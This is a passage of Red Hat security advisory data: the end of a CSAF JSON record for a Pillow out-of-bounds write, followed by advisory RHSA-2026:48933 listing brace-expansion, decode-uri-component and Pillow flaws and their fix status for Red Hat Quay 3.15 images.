"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59197"
},
{
"category": "external",
"summary": "RHBZ#2500043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2500043"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59197",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59197"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59197"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1",
"url": "https://github.com/python-pillow/Pillow/commit/cce3bdb867c77a3420261ed1bfdb6b0787ec8fc1"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/pull/9695",
"url": "https://github.com/python-pillow/Pillow/pull/9695"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0",
"url": "https://github.com/python-pillow/Pillow/releases/tag/12.3.0"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-xj96-63gp-2gmr"
}
],
"release_date": "2026-07-14T16:25:23.520000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-29T21:19:12+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-0:5.1.1-23.el8_10.src",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48021"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-0:5.1.1-23.el8_10.src",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python-pillow-debugsource-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-debuginfo-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-devel-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-doc-0:5.1.1-23.el8_10.noarch",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-0:5.1.1-23.el8_10.x86_64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.aarch64",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.i686",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.ppc64le",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.s390x",
"CRB-8.10.0.Z.MAIN.EUS:python3-pillow-tk-debuginfo-0:5.1.1-23.el8_10.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Pillow: Pillow: Native heap out-of-bounds write"
}
]
}
RHSA-2026:48933
Vulnerability from csaf_redhat - Published: 2026-07-30 20:01 - Updated: 2026-08-05 04:58A flaw was found in brace-expansion. An attacker can exploit a vulnerability in the `expand()` function by providing a specially crafted string. This string, containing consecutive non-expanding brace groups, can trigger exponential-time complexity, leading to significant CPU consumption and event-loop blocking. This can result in a Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
A flaw was found in the `decode-uri-component` library. This vulnerability allows a remote attacker to trigger a Denial of Service (DoS) by submitting specially crafted input. The `decode()` function, when processing a large number of encoded URI components, consumes excessive CPU resources, which can lead to the application becoming unresponsive and unavailable.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 | — |
Workaround
|
A flaw was found in Pillow prior to 12.3.0. When an uncompressed McIdas AREA image is loaded from a filename through the mmap raw codec path, attacker-controlled header words can set a row stride smaller than the natural row width. Pixel access such as Image.tobytes(), getpixel, convert, or save can then read beyond the mapped region, disclosing adjacent process memory or causing a fault.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le | — | ||
| Unresolved product id: Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x | — | ||
